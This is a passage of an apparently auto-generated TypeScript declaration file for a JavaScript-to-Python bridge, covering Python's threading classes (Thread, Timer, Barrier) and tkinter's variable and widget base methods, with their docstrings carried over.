*/\n\t\tparties(): Promise<any>\n\t\tparties$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of threads currently waiting at the barrier.\n\t\t */\n\t\tn_waiting(): Promise<any>\n\t\tn_waiting$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if the barrier is in a broken state.\n\t\t */\n\t\tbroken(): Promise<any>\n\t\tbroken$($: {}): Promise<any>\n\t}\n\tinterface IBrokenBarrierError {\n\t}\n\n\t/**\n\t * A class that represents a thread of control.\n\t * \n\t * This class can be safely subclassed in a limited fashion. There are two ways\n\t * to specify the activity: by passing a callable object to the constructor, or\n\t * by overriding the run() method in a subclass.\n\t * \n\t * \n\t */\n\n\t/**\n\t * This constructor should always be called with keyword arguments. Arguments are:\n\t * \n\t * *group* should be None; reserved for future extension when a ThreadGroup\n\t * class is implemented.\n\t * \n\t * *target* is the callable object to be invoked by the run()\n\t * method. 
Defaults to None, meaning nothing is called.\n\t * \n\t * *name* is the thread name. By default, a unique name is constructed of\n\t * the form \"Thread-N\" where N is a small decimal number.\n\t * \n\t * *args* is the argument tuple for the target invocation. Defaults to ().\n\t * \n\t * *kwargs* is a dictionary of keyword arguments for the target\n\t * invocation. Defaults to {}.\n\t * \n\t * If a subclass overrides the constructor, it must make sure to invoke\n\t * the base class constructor (Thread.__init__()) before doing anything\n\t * else to the thread.\n\t * \n\t * \n\t */\n\tfunction Thread(group?, target?, name?, args?, kwargs?): Promise<IThread>\n\tfunction Thread$({ group, target, name, args, kwargs }: { group?, target?, name?, args?, kwargs?}): Promise<IThread>\n\tinterface IThread {\n\n\t\t/**\n\t\t * Start the thread's activity.\n\t\t * \n\t\t * It must be called at most once per thread object. It arranges for the\n\t\t * object's run() method to be invoked in a separate thread of control.\n\t\t * \n\t\t * This method will raise a RuntimeError if called more than once on the\n\t\t * same thread object.\n\t\t * \n\t\t * \n\t\t */\n\t\tstart(): Promise<any>\n\t\tstart$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Method representing the thread's activity.\n\t\t * \n\t\t * You may override this method in a subclass. The standard run() method\n\t\t * invokes the callable object passed to the object's constructor as the\n\t\t * target argument, if any, with sequential and keyword arguments taken\n\t\t * from the args and kwargs arguments, respectively.\n\t\t * \n\t\t * \n\t\t */\n\t\trun(): Promise<any>\n\t\trun$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wait until the thread terminates.\n\t\t * \n\t\t * This blocks the calling thread until the thread whose join() method is\n\t\t * called terminates -- either normally or through an unhandled exception\n\t\t * or until the optional timeout occurs.\n\t\t * \n\t\t * When the timeout argument is present and not None, it should be a\n\t\t * floating point number specifying a timeout for the operation in seconds\n\t\t * (or fractions thereof). As join() always returns None, you must call\n\t\t * is_alive() after join() to decide whether a timeout happened -- if the\n\t\t * thread is still alive, the join() call timed out.\n\t\t * \n\t\t * When the timeout argument is not present or None, the operation will\n\t\t * block until the thread terminates.\n\t\t * \n\t\t * A thread can be join()ed many times.\n\t\t * \n\t\t * join() raises a RuntimeError if an attempt is made to join the current\n\t\t * thread as that would cause a deadlock. It is also an error to join() a\n\t\t * thread before it has been started and attempts to do so raises the same\n\t\t * exception.\n\t\t * \n\t\t * \n\t\t */\n\t\tjoin(timeout?): Promise<any>\n\t\tjoin$({ timeout }: { timeout?}): Promise<any>\n\n\t\t/**\n\t\t * A string used for identification purposes only.\n\t\t * \n\t\t * It has no semantics. Multiple threads may be given the same name. The\n\t\t * initial name is set by the constructor.\n\t\t * \n\t\t * \n\t\t */\n\t\tname(): Promise<any>\n\t\tname$($: {}): Promise<any>\n\t\tname(name): Promise<any>\n\t\tname$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Thread identifier of this thread or None if it has not been started.\n\t\t * \n\t\t * This is a nonzero integer. See the get_ident() function. Thread\n\t\t * identifiers may be recycled when a thread exits and another thread is\n\t\t * created. 
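(For illustration only; assumes the Thread$() factory above and a bridge-side callable `work`:\n\t\t * \n\t\t * const t = await threading.Thread$({ target: work })\n\t\t * await t.start()\n\t\t * const tid = await t.ident() // a nonzero integer once the thread has started\n\t\t * await t.join()\n\t\t * )\n\t\t * 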
The identifier is available even after the thread has exited.\n\t\t * \n\t\t * \n\t\t */\n\t\tident(): Promise<any>\n\t\tident$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return whether the thread is alive.\n\t\t * \n\t\t * This method returns True just before the run() method starts until just\n\t\t * after the run() method terminates. See also the module function\n\t\t * enumerate().\n\t\t * \n\t\t * \n\t\t */\n\t\tis_alive(): Promise<any>\n\t\tis_alive$($: {}): Promise<any>\n\n\t\t/**\n\t\t * A boolean value indicating whether this thread is a daemon thread.\n\t\t * \n\t\t * This must be set before start() is called, otherwise RuntimeError is\n\t\t * raised. Its initial value is inherited from the creating thread; the\n\t\t * main thread is not a daemon thread and therefore all threads created in\n\t\t * the main thread default to daemon = False.\n\t\t * \n\t\t * The entire Python program exits when only daemon threads are left.\n\t\t * \n\t\t * \n\t\t */\n\t\tdaemon(): Promise<any>\n\t\tdaemon$($: {}): Promise<any>\n\t\tdaemon(daemonic): Promise<any>\n\t\tdaemon$({ daemonic }): Promise<any>\n\n\t\t/**\n\t\t * Return whether this thread is a daemon.\n\t\t * \n\t\t * This method is deprecated, use the daemon attribute instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tisDaemon(): Promise<any>\n\t\tisDaemon$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set whether this thread is a daemon.\n\t\t * \n\t\t * This method is deprecated, use the .daemon property instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tsetDaemon(daemonic): Promise<any>\n\t\tsetDaemon$({ daemonic }): Promise<any>\n\n\t\t/**\n\t\t * Return a string used for identification purposes only.\n\t\t * \n\t\t * This method is deprecated, use the name attribute instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tgetName(): Promise<any>\n\t\tgetName$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the name string for this thread.\n\t\t * \n\t\t * This method is deprecated, use the name attribute instead.\n\t\t * \n\t\t * \n\t\t */\n\t\tsetName(name): Promise<any>\n\t\tsetName$({ name }): Promise<any>\n\t}\n\n\t/**\n\t * Call a function after a specified number of seconds:\n\t * \n\t * t = Timer(30.0, f, args=None, kwargs=None)\n\t * t.start()\n\t * t.cancel() # stop the timer's action if it's still waiting\n\t * \n\t * \n\t */\n\tfunction Timer(interval, func, args?, kwargs?): Promise<ITimer>\n\tfunction Timer$({ interval, func, args, kwargs }: { interval, func, args?, kwargs?}): Promise<ITimer>\n\tinterface ITimer extends IThread {\n\n\t\t/**\n\t\t * Stop the timer if it hasn't finished yet.\n\t\t */\n\t\tcancel(): Promise<any>\n\t\tcancel$($: {}): Promise<any>\n\t\trun(): Promise<any>\n\t\trun$($: {}): Promise<any>\n\t}\n\tinterface I_MainThread extends IThread {\n\t}\n\tinterface I_DummyThread extends IThread {\n\t\tis_alive(): Promise<any>\n\t\tis_alive$($: {}): Promise<any>\n\t\tjoin(timeout?): Promise<any>\n\t\tjoin$({ timeout }: { timeout?}): Promise<any>\n\t}\n\tlet get_ident: Promise<any>\n\tlet get_native_id: Promise<any>\n\tlet ThreadError: Promise<any>\n\tlet TIMEOUT_MAX: Promise<any>\n\tlet Lock: Promise<any>\n}\ndeclare module tkinter {\n\tvar _\n\n\t/**\n\t * Inhibit setting of default root window.\n\t * \n\t * Call this function to inhibit that the first instance of\n\t * Tk is used for windows without an explicit parent window.\n\t * \n\t */\n\tfunction NoDefaultRoot(): Promise<any>\n\tfunction NoDefaultRoot$($: {}): Promise<any>\n\n\t/**\n\t * Run the main loop of Tcl.\n\t */\n\tfunction mainloop(n?): Promise<any>\n\tfunction mainloop$({ n }: { n?}): 
Promise<any>\n\n\t/**\n\t * Convert Tcl object to True or False.\n\t */\n\tfunction getboolean(s): Promise<any>\n\tfunction getboolean$({ s }): Promise<any>\n\tfunction Tcl(screenName?, baseName?, className?, useTk?: boolean): Promise<any>\n\tfunction Tcl$({ screenName, baseName, className, useTk }: { screenName?, baseName?, className?, useTk?}): Promise<any>\n\tfunction image_names(): Promise<any>\n\tfunction image_names$($: {}): Promise<any>\n\tfunction image_types(): Promise<any>\n\tfunction image_types$($: {}): Promise<any>\n\tinterface IEventType {\n\t\tKeyPress\n\t\tKey\n\t\tKeyRelease\n\t\tButtonPress\n\t\tButton\n\t\tButtonRelease\n\t\tMotion\n\t\tEnter\n\t\tLeave\n\t\tFocusIn\n\t\tFocusOut\n\t\tKeymap\n\t\tExpose\n\t\tGraphicsExpose\n\t\tNoExpose\n\t\tVisibility\n\t\tCreate\n\t\tDestroy\n\t\tUnmap\n\t\tMap\n\t\tMapRequest\n\t\tReparent\n\t\tConfigure\n\t\tConfigureRequest\n\t\tGravity\n\t\tResizeRequest\n\t\tCirculate\n\t\tCirculateRequest\n\t\tProperty\n\t\tSelectionClear\n\t\tSelectionRequest\n\t\tSelection\n\t\tColormap\n\t\tClientMessage\n\t\tMapping\n\t\tVirtualEvent\n\t\tActivate\n\t\tDeactivate\n\t\tMouseWheel\n\t}\n\n\t/**\n\t * Container for the properties of an event.\n\t * \n\t * Instances of this type are generated if one of the following events occurs:\n\t * \n\t * KeyPress, KeyRelease - for keyboard events\n\t * ButtonPress, ButtonRelease, Motion, Enter, Leave, MouseWheel - for mouse events\n\t * Visibility, Unmap, Map, Expose, FocusIn, FocusOut, Circulate,\n\t * Colormap, Gravity, Reparent, Property, Destroy, Activate,\n\t * Deactivate - for window events.\n\t * \n\t * If a callback function for one of these events is registered\n\t * using bind, bind_all, bind_class, or tag_bind, the callback is\n\t * called with an Event as first argument. It will have the\n\t * following attributes (in braces are the event types for which\n\t * the attribute is valid):\n\t * \n\t * serial - serial number of event\n\t * num - mouse button pressed (ButtonPress, ButtonRelease)\n\t * focus - whether the window has the focus (Enter, Leave)\n\t * height - height of the exposed window (Configure, Expose)\n\t * width - width of the exposed window (Configure, Expose)\n\t * keycode - keycode of the pressed key (KeyPress, KeyRelease)\n\t * state - state of the event as a number (ButtonPress, ButtonRelease,\n\t * Enter, KeyPress, KeyRelease,\n\t * Leave, Motion)\n\t * state - state as a string (Visibility)\n\t * time - when the event occurred\n\t * x - x-position of the mouse\n\t * y - y-position of the mouse\n\t * x_root - x-position of the mouse on the screen\n\t * (ButtonPress, ButtonRelease, KeyPress, KeyRelease, Motion)\n\t * y_root - y-position of the mouse on the screen\n\t * (ButtonPress, ButtonRelease, KeyPress, KeyRelease, Motion)\n\t * char - pressed character (KeyPress, KeyRelease)\n\t * send_event - see X/Windows documentation\n\t * keysym - keysym of the event as a string (KeyPress, KeyRelease)\n\t * keysym_num - keysym of the event as a number (KeyPress, KeyRelease)\n\t * type - type of the event as a number\n\t * widget - widget in which the event occurred\n\t * delta - delta of wheel movement (MouseWheel)\n\t * \n\t */\n\tinterface IEvent {\n\t}\n\n\t/**\n\t * Class to define value holders for e.g. 
buttons.\n\t * \n\t * Subclasses StringVar, IntVar, DoubleVar, BooleanVar are specializations\n\t * that constrain the type of the value returned from get().\n\t */\n\n\t/**\n\t * Construct a variable\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to \"\")\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction Variable(master?, value?, name?): Promise<IVariable>\n\tfunction Variable$({ master, value, name }: { master?, value?, name?}): Promise<IVariable>\n\tinterface IVariable {\n\n\t\t/**\n\t\t * Set the variable to VALUE.\n\t\t */\n\t\tset(value): Promise<any>\n\t\tset$({ value }): Promise<any>\n\n\t\t/**\n\t\t * Return value of variable.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Define a trace callback for the variable.\n\t\t * \n\t\t * Mode is one of \"read\", \"write\", \"unset\", or a list or tuple of\n\t\t * such strings.\n\t\t * Callback must be a function which is called when the variable is\n\t\t * read, written or unset.\n\t\t * \n\t\t * Return the name of the callback.\n\t\t * \n\t\t */\n\t\ttrace_add(mode, callback): Promise<any>\n\t\ttrace_add$({ mode, callback }): Promise<any>\n\n\t\t/**\n\t\t * Delete the trace callback for a variable.\n\t\t * \n\t\t * Mode is one of \"read\", \"write\", \"unset\" or a list or tuple of\n\t\t * such strings. Must be same as were specified in trace_add().\n\t\t * cbname is the name of the callback returned from trace_add().\n\t\t * \n\t\t */\n\t\ttrace_remove(mode, cbname): Promise<any>\n\t\ttrace_remove$({ mode, cbname }): Promise<any>\n\n\t\t/**\n\t\t * Return all trace callback information.\n\t\t */\n\t\ttrace_info(): Promise<any>\n\t\ttrace_info$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Define a trace callback for the variable.\n\t\t * \n\t\t * MODE is one of \"r\", \"w\", \"u\" for read, write, undefine.\n\t\t * CALLBACK must be a function which is called when\n\t\t * the variable is read, written or undefined.\n\t\t * \n\t\t * Return the name of the callback.\n\t\t * \n\t\t * This deprecated method wraps a deprecated Tcl method that will\n\t\t * likely be removed in the future. Use trace_add() instead.\n\t\t * \n\t\t */\n\t\ttrace_variable(mode, callback): Promise<any>\n\t\ttrace_variable$({ mode, callback }): Promise<any>\n\n\t\t/**\n\t\t * Delete the trace callback for a variable.\n\t\t * \n\t\t * MODE is one of \"r\", \"w\", \"u\" for read, write, undefine.\n\t\t * CBNAME is the name of the callback returned from trace_variable or trace.\n\t\t * \n\t\t * This deprecated method wraps a deprecated Tcl method that will\n\t\t * likely be removed in the future. Use trace_remove() instead.\n\t\t * \n\t\t */\n\t\ttrace_vdelete(mode, cbname): Promise<any>\n\t\ttrace_vdelete$({ mode, cbname }): Promise<any>\n\n\t\t/**\n\t\t * Return all trace callback information.\n\t\t * \n\t\t * This deprecated method wraps a deprecated Tcl method that will\n\t\t * likely be removed in the future. 
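(A hypothetical sketch of the replacement API; `v` is assumed to implement IVariable:\n\t\t * \n\t\t * const cb = await v.trace_add('write', onWrite) // onWrite is a bridge-side callback\n\t\t * console.log(await v.trace_info())\n\t\t * await v.trace_remove('write', cb)\n\t\t * )\n\t\t * 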
Use trace_info() instead.\n\t\t * \n\t\t */\n\t\ttrace_vinfo(): Promise<any>\n\t\ttrace_vinfo$($: {}): Promise<any>\n\t\tinitialize\n\t\ttrace\n\t}\n\n\t/**\n\t * Value holder for strings variables.\n\t */\n\n\t/**\n\t * Construct a string variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to \"\")\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction StringVar(master?, value?, name?): Promise<IStringVar>\n\tfunction StringVar$({ master, value, name }: { master?, value?, name?}): Promise<IStringVar>\n\tinterface IStringVar extends IVariable {\n\n\t\t/**\n\t\t * Return value of variable as string.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Value holder for integer variables.\n\t */\n\n\t/**\n\t * Construct an integer variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to 0)\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction IntVar(master?, value?, name?): Promise<IIntVar>\n\tfunction IntVar$({ master, value, name }: { master?, value?, name?}): Promise<IIntVar>\n\tinterface IIntVar extends IVariable {\n\n\t\t/**\n\t\t * Return the value of the variable as an integer.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Value holder for float variables.\n\t */\n\n\t/**\n\t * Construct a float variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to 0.0)\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction DoubleVar(master?, value?, name?): Promise<IDoubleVar>\n\tfunction DoubleVar$({ master, value, name }: { master?, value?, name?}): Promise<IDoubleVar>\n\tinterface IDoubleVar extends IVariable {\n\n\t\t/**\n\t\t * Return the value of the variable as a float.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Value holder for boolean variables.\n\t */\n\n\t/**\n\t * Construct a boolean variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to False)\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction BooleanVar(master?, value?, name?): Promise<IBooleanVar>\n\tfunction BooleanVar$({ master, value, name }: { master?, value?, name?}): Promise<IBooleanVar>\n\tinterface IBooleanVar extends IVariable {\n\n\t\t/**\n\t\t * Set the variable to VALUE.\n\t\t */\n\t\tset(value): Promise<any>\n\t\tset$({ value }): Promise<any>\n\n\t\t/**\n\t\t * Return the value of the variable as a bool.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Internal class.\n\t * \n\t * Base class which defines methods common for interior widgets.\n\t */\n\tinterface IMisc {\n\n\t\t/**\n\t\t * Internal function.\n\t\t * \n\t\t * Delete all Tcl commands created for\n\t\t * this widget in the Tcl interpreter.\n\t\t */\n\t\tdestroy(): Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Internal 
function.\n\t\t * \n\t\t * Delete the Tcl command provided in NAME.\n\t\t */\n\t\tdeletecommand(name): Promise<any>\n\t\tdeletecommand$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Set Tcl internal variable, whether the look and feel\n\t\t * should adhere to Motif.\n\t\t * \n\t\t * A parameter of 1 means adhere to Motif (e.g. no color\n\t\t * change if mouse passes over slider).\n\t\t * Returns the set value.\n\t\t */\n\t\ttk_strictMotif(boolean?): Promise<any>\n\t\ttk_strictMotif$({ boolean }: { boolean?}): Promise<any>\n\n\t\t/**\n\t\t * Change the color scheme to light brown as used in Tk 3.6 and before.\n\t\t */\n\t\ttk_bisque(): Promise<any>\n\t\ttk_bisque$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set a new color scheme for all widget elements.\n\t\t * \n\t\t * A single color as argument will cause that all colors of Tk\n\t\t * widget elements are derived from this.\n\t\t * Alternatively several keyword parameters and its associated\n\t\t * colors can be given. The following keywords are valid:\n\t\t * activeBackground, foreground, selectColor,\n\t\t * activeForeground, highlightBackground, selectBackground,\n\t\t * background, highlightColor, selectForeground,\n\t\t * disabledForeground, insertBackground, troughColor.\n\t\t */\n\t\ttk_setPalette(): Promise<any>\n\t\ttk_setPalette$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wait until the variable is modified.\n\t\t * \n\t\t * A parameter of type IntVar, StringVar, DoubleVar or\n\t\t * BooleanVar must be given.\n\t\t */\n\t\twait_variable(name?): Promise<any>\n\t\twait_variable$({ name }: { name?}): Promise<any>\n\n\t\t/**\n\t\t * Wait until a WIDGET is destroyed.\n\t\t * \n\t\t * If no parameter is given self is used.\n\t\t */\n\t\twait_window(window?): Promise<any>\n\t\twait_window$({ window }: { window?}): Promise<any>\n\n\t\t/**\n\t\t * Wait until the visibility of a WIDGET changes\n\t\t * (e.g. it appears).\n\t\t * \n\t\t * If no parameter is given self is used.\n\t\t */\n\t\twait_visibility(window?): Promise<any>\n\t\twait_visibility$({ window }: { window?}): Promise<any>\n\n\t\t/**\n\t\t * Set Tcl variable NAME to VALUE.\n\t\t */\n\t\tsetvar(name?, value?): Promise<any>\n\t\tsetvar$({ name, value }: { name?, value?}): Promise<any>\n\n\t\t/**\n\t\t * Return value of Tcl variable NAME.\n\t\t */\n\t\tgetvar(name?): Promise<any>\n\t\tgetvar$({ name }: { name?}): Promise<any>\n\t\tgetint(s): Promise<any>\n\t\tgetint$({ s }): Promise<any>\n\t\tgetdouble(s): Promise<any>\n\t\tgetdouble$({ s }): Promise<any>\n\n\t\t/**\n\t\t * Return a boolean value for Tcl boolean values true and false given as parameter.\n\t\t */\n\t\tgetboolean(s): Promise<any>\n\t\tgetboolean$({ s }): Promise<any>\n\n\t\t/**\n\t\t * Direct input focus to this widget.\n\t\t * \n\t\t * If the application currently does not have the focus\n\t\t * this widget will get the focus if the application gets\n\t\t * the focus through the window manager.\n\t\t */\n\t\tfocus_set(): Promise<any>\n\t\tfocus_set$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Direct input focus to this widget even if the\n\t\t * application does not have the focus. Use with\n\t\t * caution!\n\t\t */\n\t\tfocus_force(): Promise<any>\n\t\tfocus_force$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which has currently the focus in the\n\t\t * application.\n\t\t * \n\t\t * Use focus_displayof to allow working with several\n\t\t * displays. 
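(Sketch only; `widget` is assumed to implement IMisc:\n\t\t * \n\t\t * const focused = await widget.focus_get() // may be None, see below\n\t\t * )\n\t\t * 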
Return None if application does not have\n\t\t * the focus.\n\t\t */\n\t\tfocus_get(): Promise<any>\n\t\tfocus_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which has currently the focus on the\n\t\t * display where this widget is located.\n\t\t * \n\t\t * Return None if the application does not have the focus.\n\t\t */\n\t\tfocus_displayof(): Promise<any>\n\t\tfocus_displayof$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which would have the focus if top level\n\t\t * for this widget gets the focus from the window manager.\n\t\t */\n\t\tfocus_lastfor(): Promise<any>\n\t\tfocus_lastfor$($: {}): Promise<any>\n\n\t\t/**\n\t\t * The widget under mouse will get automatically focus. Can not\n\t\t * be disabled easily.\n\t\t */\n\t\ttk_focusFollowsMouse(): Promise<any>\n\t\ttk_focusFollowsMouse$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the next widget in the focus order which follows\n\t\t * widget which has currently the focus.\n\t\t * \n\t\t * The focus order first goes to the next child, then to\n\t\t * the children of the child recursively and then to the\n\t\t * next sibling which is higher in the stacking order. A\n\t\t * widget is omitted if it has the takefocus resource set\n\t\t * to 0.\n\t\t */\n\t\ttk_focusNext(): Promise<any>\n\t\ttk_focusNext$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return previous widget in the focus order. See tk_focusNext for details.\n\t\t */\n\t\ttk_focusPrev(): Promise<any>\n\t\ttk_focusPrev$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Call function once after given time.\n\t\t * \n\t\t * MS specifies the time in milliseconds. FUNC gives the\n\t\t * function which shall be called. Additional parameters\n\t\t * are given as parameters to the function call. Return\n\t\t * identifier to cancel scheduling with after_cancel.\n\t\t */\n\t\tafter(ms, func?): Promise<any>\n\t\tafter$({ ms, func }: { ms, func?}): Promise<any>\n\n\t\t/**\n\t\t * Call FUNC once if the Tcl main loop has no event to\n\t\t * process.\n\t\t * \n\t\t * Return an identifier to cancel the scheduling with\n\t\t * after_cancel.\n\t\t */\n\t\tafter_idle(func): Promise<any>\n\t\tafter_idle$({ func }): Promise<any>\n\n\t\t/**\n\t\t * Cancel scheduling of function identified with ID.\n\t\t * \n\t\t * Identifier returned by after or after_idle must be\n\t\t * given as first parameter.\n\t\t * \n\t\t */\n\t\tafter_cancel(id): Promise<any>\n\t\tafter_cancel$({ id }): Promise<any>\n\n\t\t/**\n\t\t * Ring a display's bell.\n\t\t */\n\t\tbell(displayof?): Promise<any>\n\t\tbell$({ displayof }: { displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Retrieve data from the clipboard on window's display.\n\t\t * \n\t\t * The window keyword defaults to the root window of the Tkinter\n\t\t * application.\n\t\t * \n\t\t * The type keyword specifies the form in which the data is\n\t\t * to be returned and should be an atom name such as STRING\n\t\t * or FILE_NAME. 
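(An illustrative round-trip, assuming `widget` implements IMisc:\n\t\t * \n\t\t * await widget.clipboard_clear()\n\t\t * await widget.clipboard_append('hello')\n\t\t * const text = await widget.clipboard_get() // 'hello'\n\t\t * )\n\t\t * 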
Type defaults to STRING, except on X11, where the default\n\t\t * is to try UTF8_STRING and fall back to STRING.\n\t\t * \n\t\t * This command is equivalent to:\n\t\t * \n\t\t * selection_get(CLIPBOARD)\n\t\t * \n\t\t */\n\t\tclipboard_get(): Promise<any>\n\t\tclipboard_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Clear the data in the Tk clipboard.\n\t\t * \n\t\t * A widget specified for the optional displayof keyword\n\t\t * argument specifies the target display.\n\t\t */\n\t\tclipboard_clear(): Promise<any>\n\t\tclipboard_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Append STRING to the Tk clipboard.\n\t\t * \n\t\t * A widget specified at the optional displayof keyword\n\t\t * argument specifies the target display. The clipboard\n\t\t * can be retrieved with selection_get.\n\t\t */\n\t\tclipboard_append(string): Promise<any>\n\t\tclipboard_append$({ string }): Promise<any>\n\n\t\t/**\n\t\t * Return widget which has currently the grab in this application\n\t\t * or None.\n\t\t */\n\t\tgrab_current(): Promise<any>\n\t\tgrab_current$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Release grab for this widget if currently set.\n\t\t */\n\t\tgrab_release(): Promise<any>\n\t\tgrab_release$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set grab for this widget.\n\t\t * \n\t\t * A grab directs all events to this and descendant\n\t\t * widgets in the application.\n\t\t */\n\t\tgrab_set(): Promise<any>\n\t\tgrab_set$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set global grab for this widget.\n\t\t * \n\t\t * A global grab directs all events to this and\n\t\t * descendant widgets on the display. Use with caution -\n\t\t * other applications do not get events anymore.\n\t\t */\n\t\tgrab_set_global(): Promise<any>\n\t\tgrab_set_global$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return None, \"local\" or \"global\" if this widget has\n\t\t * no, a local or a global grab.\n\t\t */\n\t\tgrab_status(): Promise<any>\n\t\tgrab_status$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set a VALUE (second parameter) for an option\n\t\t * PATTERN (first parameter).\n\t\t * \n\t\t * An optional third parameter gives the numeric priority\n\t\t * (defaults to 80).\n\t\t */\n\t\toption_add(pattern, value, priority?): Promise<any>\n\t\toption_add$({ pattern, value, priority }: { pattern, value, priority?}): Promise<any>\n\n\t\t/**\n\t\t * Clear the option database.\n\t\t * \n\t\t * It will be reloaded if option_add is called.\n\t\t */\n\t\toption_clear(): Promise<any>\n\t\toption_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the value for an option NAME for this widget\n\t\t * with CLASSNAME.\n\t\t * \n\t\t * Values with higher priority override lower values.\n\t\t */\n\t\toption_get(name, className): Promise<any>\n\t\toption_get$({ name, className }): Promise<any>\n\n\t\t/**\n\t\t * Read file FILENAME into the option database.\n\t\t * \n\t\t * An optional second parameter gives the numeric\n\t\t * priority.\n\t\t */\n\t\toption_readfile(fileName, priority?): Promise<any>\n\t\toption_readfile$({ fileName, priority }: { fileName, priority?}): Promise<any>\n\n\t\t/**\n\t\t * Clear the current X selection.\n\t\t */\n\t\tselection_clear(): Promise<any>\n\t\tselection_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the contents of the current X selection.\n\t\t * \n\t\t * A keyword parameter selection specifies the name of\n\t\t * the selection and defaults to PRIMARY. A keyword\n\t\t * parameter displayof specifies a widget on the display\n\t\t * to use. 
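(A hypothetical sketch, assuming `widget` implements IMisc and a selection currently exists:\n\t\t * \n\t\t * const sel = await widget.selection_get() // the PRIMARY selection by default\n\t\t * )\n\t\t * 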
A keyword parameter type specifies the form of data to be\n\t\t * fetched, defaulting to STRING except on X11, where UTF8_STRING is tried\n\t\t * before STRING.\n\t\t */\n\t\tselection_get(): Promise<any>\n\t\tselection_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Specify a function COMMAND to call if the X\n\t\t * selection owned by this widget is queried by another\n\t\t * application.\n\t\t * \n\t\t * This function must return the contents of the\n\t\t * selection. The function will be called with the\n\t\t * arguments OFFSET and LENGTH which allows the chunking\n\t\t * of very long selections. The following keyword\n\t\t * parameters can be provided:\n\t\t * selection - name of the selection (default PRIMARY),\n\t\t * type - type of the selection (e.g. STRING, FILE_NAME).\n\t\t */\n\t\tselection_handle(command): Promise<any>\n\t\tselection_handle$({ command }): Promise<any>\n\n\t\t/**\n\t\t * Become owner of X selection.\n\t\t * \n\t\t * A keyword parameter selection specifies the name of\n\t\t * the selection (default PRIMARY).\n\t\t */\n\t\tselection_own(): Promise<any>\n\t\tselection_own$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return owner of X selection.\n\t\t * \n\t\t * The following keyword parameter can\n\t\t * be provided:\n\t\t * selection - name of the selection (default PRIMARY),\n\t\t * type - type of the selection (e.g. STRING, FILE_NAME).\n\t\t */\n\t\tselection_own_get(): Promise<any>\n\t\tselection_own_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Send Tcl command CMD to different interpreter INTERP to be executed.\n\t\t */\n\t\tsend(interp, cmd): Promise<any>\n\t\tsend$({ interp, cmd }): Promise<any>\n\n\t\t/**\n\t\t * Lower this widget in the stacking order.\n\t\t */\n\t\tlower(belowThis?): Promise<any>\n\t\tlower$({ belowThis }: { belowThis?}): Promise<any>\n\n\t\t/**\n\t\t * Raise this widget in the stacking order.\n\t\t */\n\t\ttkraise(aboveThis?): Promise<any>\n\t\ttkraise$({ aboveThis }: { aboveThis?}): Promise<any>\n\n\t\t/**\n\t\t * Return integer which represents atom NAME.\n\t\t */\n\t\twinfo_atom(name, displayof?): Promise<any>\n\t\twinfo_atom$({ name, displayof }: { name, displayof?}): 